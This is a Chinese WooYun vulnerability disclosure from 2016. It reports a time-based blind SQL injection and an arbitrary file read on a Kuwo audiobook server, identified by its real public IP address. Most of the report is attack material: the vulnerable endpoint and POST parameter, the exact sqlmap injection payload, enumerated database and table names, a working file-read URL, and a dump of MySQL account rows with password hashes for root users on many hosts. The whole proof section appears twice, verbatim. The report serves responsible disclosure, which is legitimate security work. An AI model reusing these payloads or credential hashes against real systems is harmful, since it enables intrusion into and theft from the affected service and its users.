当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198775

漏洞标题:酷我某处ROOT权限注入or任意文件读取

相关厂商:酷我音乐

漏洞作者: 秋末诉伤

提交时间:2016-04-21 10:25

修复时间:2016-06-05 10:50

公开时间:2016-06-05 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-21: 厂商已经确认,细节仅向厂商公开
2016-05-01: 细节向核心白帽子及相关领域专家公开
2016-05-11: 细节向普通白帽子公开
2016-05-21: 细节向实习白帽子公开
2016-06-05: 细节向公众公开

简要描述:

root

详细说明:

酷我听书注入:http://60.28.216.70/ 如何确认是酷我的呢?看看页面源代码,至于怎么确认是酷我听书的站点,请看后面详情。

1.png


http://60.28.216.70/log.php
POST: method=statbyparent&parentid=1&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4


上神器SQLMAP》》》DBA权限

2.png


Parameter: parentid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])


sqlmap identified the following injection point(s) with a total of 2632 HTTP(s) requests:
---
Parameter: parentid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
information_schema
[*] kuwofm_online
[*] kw_tingshu
[*] kwts_user
[*] logstat
[*] mysql
[*] performance_schema
[*] test
[*] tsbiz
[*] tsbook
[*] tslog
[*] umeng
Database: kuwofm_online
[56 tables]
+-----------------------------------+
| user |
| version |
| apscheduler_jobs |
| audio_file |
| category |
| channel |
| channel_UV |
| channel_bak |
| channel_category_map |
| channel_music |
| defined_play_column |
| defined_play_column_map |
| file_sequence |
| fm_channel_playback |
| fm_channel_program |
| fm_date_storage_map |
| fm_failed_order |
| fm_product_define |
| fm_program_category |
| fm_program_category_map |
| fm_program_daily |
| fm_program_hot |
| fm_program_record |
| fm_program_record_play |
| fm_recommend_banner |
| fm_recommend_banner_programlist |
| fm_recommend_program |
| fm_success_order |
| fm_user |
| fm_user_product |
| hls_host |
| location |
| message_push |
| message_push_configuration |
| music |
| param_conf |
| program |
| recommend |
| record_play_banner |
| record_play_hot |
| record_play_role_map |
| record_program_category |
| record_program_feedback |
| record_program_tag_map |
| record_program_task |
| record_tag |
| record_tag_category |
| record_tag_map |
| star_channel |
| temp_channel |
| test |
| url_map |
| user_channel |
| user_listen_record |
| user_modifytime |
| user_record_play_collection |
+-----------------------------------+
Database: kw_tingshu
[23 tables]
+-----------------------------------+
| paytmp |
| tbl_book_basic |
| tbl_book_basic_offline |
| tbl_book_cat_relation |
| tbl_book_extra |
| tbl_book_statistics |
| tbl_business_user |
| tbl_cat |
| tbl_chapter |
| tbl_chapter_tmp |
| tbl_login_log |
| tbl_order |
| tbl_pay_log |
| tbl_umeng_new_user |
| tbl_uninstall |
| tbl_user_activity |
| tbl_user_base |
| tmp_ad |
| tmp_ad2 |
| usertmp |
| vip_pay_3 |
| vip_pay_jan |
| vip_pay_tmp |
+-----------------------------------+
Database: kwts_user
[1 table]
+-----------------------------------+
| user_classify |
+-----------------------------------+
Database: tsbook
[34 tables]
+-----------------------------------+
| bookr |
| tbl_3rd_zhuishu |
| tbl_book |
| tbl_book_cat |
| tbl_book_data |
| tbl_book_day_log |
| tbl_book_extr |
| tbl_book_log |
| tbl_book_mass |
| tbl_book_tmp |
| tbl_cat |
| tbl_cat_copy |
| tbl_chapter |
| tbl_chapter_data |
| tbl_chapter_log |
| tbl_chapter_tmp |
| tbl_copyright |
| tbl_editor_newest |
| tbl_editor_novel |
| tbl_editor_novel_top |
| tbl_editor_rec_type |
| tbl_editor_recommend |
| tbl_editor_startpage |
| tbl_editor_tag |
| tbl_editor_textlink_login_channel |
| tbl_focus_list |
| tbl_focus_list_tmp |
| tbl_focus_type |
| tbl_page_layout |
| tbl_topic |
| tbl_topic_detail |
| third_app_key |
| tmp_book_cnt |
| tmp_data |
+-----------------------------------+
Database: tsbiz
[13 tables]
+-----------------------------------+
| tbl_activate |
| tbl_ad_flag |
| tbl_ad_list |
| tbl_invite |
| tbl_invite_vip_log |
| tbl_ios_active_idfa |
| tbl_ios_mark_idfas |
| tbl_lucky_ids |
| tbl_lucky_prize_list |
| tbl_mip_order |
| tbl_music_rank_rec |
| tbl_music_ranking |
| tbl_vip_pay_log |
+-----------------------------------+
[22:55:20] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 8 times
[22:55:20] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
[22:55:20] [INFO] fetched data logged to text files under '/root/.sqlmap/output/60.28.216.70'


酷我听书站:

3.png


--------------------------------------------------------------------------------
任意文件读取:

http://60.28.216.70/download.php?file=/data1/logdata/temp/stat_parentid_1.txt


----------------------------------------------------------------------
附数据库配置,看IP可以看出是酷我的。

Host,User,plugin,Password,ssl_type,Drop_priv,File_priv,Grant_priv,Alter_priv,ssl_cipher,Index_priv,Event_priv,Super_priv,Create_priv,Update_priv,Reload_priv,Delete_priv,Insert_priv,x509_issuer,Select_priv,max_updates,Execute_priv,Show_db_priv,x509_subject,Process_priv,Trigger_priv,Shutdown_priv,max_questions,Show_view_priv,max_connections,Repl_slave_priv,References_priv,Repl_client_priv,Create_user_priv,password_expired,Lock_tables_priv,Create_view_priv,Alter_routine_priv,Create_routine_priv,max_user_connections,authentication_string,Create_tmp_table_priv,Create_tablespace_priv
127.0.0.1,root,<blank>,<blank>,<blank>,Y,Y,Y,Y,<blank>,Y,Y,Y,Y,Y,Y,Y,Y,<blank>,Y,0,Y,Y,<blank>,Y,Y,Y,0,Y,0,Y,Y,Y,Y,N,Y,Y,Y,Y,0,<blank>,Y,Y
192.168.%,kwts,mysql_native_password,*E7E14591B4390736D0BEA2602FED5C7A908858B0
192.168.0.39,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.53,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.176,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.179,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.226.166,nagios,mysql_native_password,*854A5FFA0256648A594D2D46C12610BE25FDB957
60.28.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.210.91,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.216.69,root,mysql_nativ,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B


请审核打码吧。。

漏洞证明:

酷我听书注入:http://60.28.216.70/ 如何确认是酷我的呢?看看页面源代码,至于怎么确认是酷我听书的站点,请看后面详情。

1.png


http://60.28.216.70/log.php
POST: method=statbyparent&parentid=1&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4


上神器SQLMAP》》》DBA权限

2.png


Parameter: parentid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])


sqlmap identified the following injection point(s) with a total of 2632 HTTP(s) requests:
---
Parameter: parentid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
information_schema
[*] kuwofm_online
[*] kw_tingshu
[*] kwts_user
[*] logstat
[*] mysql
[*] performance_schema
[*] test
[*] tsbiz
[*] tsbook
[*] tslog
[*] umeng
Database: kuwofm_online
[56 tables]
+-----------------------------------+
| user |
| version |
| apscheduler_jobs |
| audio_file |
| category |
| channel |
| channel_UV |
| channel_bak |
| channel_category_map |
| channel_music |
| defined_play_column |
| defined_play_column_map |
| file_sequence |
| fm_channel_playback |
| fm_channel_program |
| fm_date_storage_map |
| fm_failed_order |
| fm_product_define |
| fm_program_category |
| fm_program_category_map |
| fm_program_daily |
| fm_program_hot |
| fm_program_record |
| fm_program_record_play |
| fm_recommend_banner |
| fm_recommend_banner_programlist |
| fm_recommend_program |
| fm_success_order |
| fm_user |
| fm_user_product |
| hls_host |
| location |
| message_push |
| message_push_configuration |
| music |
| param_conf |
| program |
| recommend |
| record_play_banner |
| record_play_hot |
| record_play_role_map |
| record_program_category |
| record_program_feedback |
| record_program_tag_map |
| record_program_task |
| record_tag |
| record_tag_category |
| record_tag_map |
| star_channel |
| temp_channel |
| test |
| url_map |
| user_channel |
| user_listen_record |
| user_modifytime |
| user_record_play_collection |
+-----------------------------------+
Database: kw_tingshu
[23 tables]
+-----------------------------------+
| paytmp |
| tbl_book_basic |
| tbl_book_basic_offline |
| tbl_book_cat_relation |
| tbl_book_extra |
| tbl_book_statistics |
| tbl_business_user |
| tbl_cat |
| tbl_chapter |
| tbl_chapter_tmp |
| tbl_login_log |
| tbl_order |
| tbl_pay_log |
| tbl_umeng_new_user |
| tbl_uninstall |
| tbl_user_activity |
| tbl_user_base |
| tmp_ad |
| tmp_ad2 |
| usertmp |
| vip_pay_3 |
| vip_pay_jan |
| vip_pay_tmp |
+-----------------------------------+
Database: kwts_user
[1 table]
+-----------------------------------+
| user_classify |
+-----------------------------------+
Database: tsbook
[34 tables]
+-----------------------------------+
| bookr |
| tbl_3rd_zhuishu |
| tbl_book |
| tbl_book_cat |
| tbl_book_data |
| tbl_book_day_log |
| tbl_book_extr |
| tbl_book_log |
| tbl_book_mass |
| tbl_book_tmp |
| tbl_cat |
| tbl_cat_copy |
| tbl_chapter |
| tbl_chapter_data |
| tbl_chapter_log |
| tbl_chapter_tmp |
| tbl_copyright |
| tbl_editor_newest |
| tbl_editor_novel |
| tbl_editor_novel_top |
| tbl_editor_rec_type |
| tbl_editor_recommend |
| tbl_editor_startpage |
| tbl_editor_tag |
| tbl_editor_textlink_login_channel |
| tbl_focus_list |
| tbl_focus_list_tmp |
| tbl_focus_type |
| tbl_page_layout |
| tbl_topic |
| tbl_topic_detail |
| third_app_key |
| tmp_book_cnt |
| tmp_data |
+-----------------------------------+
Database: tsbiz
[13 tables]
+-----------------------------------+
| tbl_activate |
| tbl_ad_flag |
| tbl_ad_list |
| tbl_invite |
| tbl_invite_vip_log |
| tbl_ios_active_idfa |
| tbl_ios_mark_idfas |
| tbl_lucky_ids |
| tbl_lucky_prize_list |
| tbl_mip_order |
| tbl_music_rank_rec |
| tbl_music_ranking |
| tbl_vip_pay_log |
+-----------------------------------+
[22:55:20] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 8 times
[22:55:20] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
[22:55:20] [INFO] fetched data logged to text files under '/root/.sqlmap/output/60.28.216.70'


酷我听书站:

3.png


--------------------------------------------------------------------------------
任意文件读取:

http://60.28.216.70/download.php?file=/data1/logdata/temp/stat_parentid_1.txt


----------------------------------------------------------------------
附数据库配置,看IP可以看出是酷我的。

Host,User,plugin,Password,ssl_type,Drop_priv,File_priv,Grant_priv,Alter_priv,ssl_cipher,Index_priv,Event_priv,Super_priv,Create_priv,Update_priv,Reload_priv,Delete_priv,Insert_priv,x509_issuer,Select_priv,max_updates,Execute_priv,Show_db_priv,x509_subject,Process_priv,Trigger_priv,Shutdown_priv,max_questions,Show_view_priv,max_connections,Repl_slave_priv,References_priv,Repl_client_priv,Create_user_priv,password_expired,Lock_tables_priv,Create_view_priv,Alter_routine_priv,Create_routine_priv,max_user_connections,authentication_string,Create_tmp_table_priv,Create_tablespace_priv
127.0.0.1,root,<blank>,<blank>,<blank>,Y,Y,Y,Y,<blank>,Y,Y,Y,Y,Y,Y,Y,Y,<blank>,Y,0,Y,Y,<blank>,Y,Y,Y,0,Y,0,Y,Y,Y,Y,N,Y,Y,Y,Y,0,<blank>,Y,Y
192.168.%,kwts,mysql_native_password,*E7E14591B4390736D0BEA2602FED5C7A908858B0
192.168.0.39,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.53,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.176,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.179,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.226.166,nagios,mysql_native_password,*854A5FFA0256648A594D2D46C12610BE25FDB957
60.28.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.210.91,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.216.69,root,mysql_nativ,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B


请审核打码吧。。

修复方案:

你们更懂。。

版权声明:转载请注明来源 秋末诉伤@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-21 10:43

厂商回复:

感谢对酷我的支持,我们将尽快审核修复。

最新状态:

暂无


漏洞评价:

评价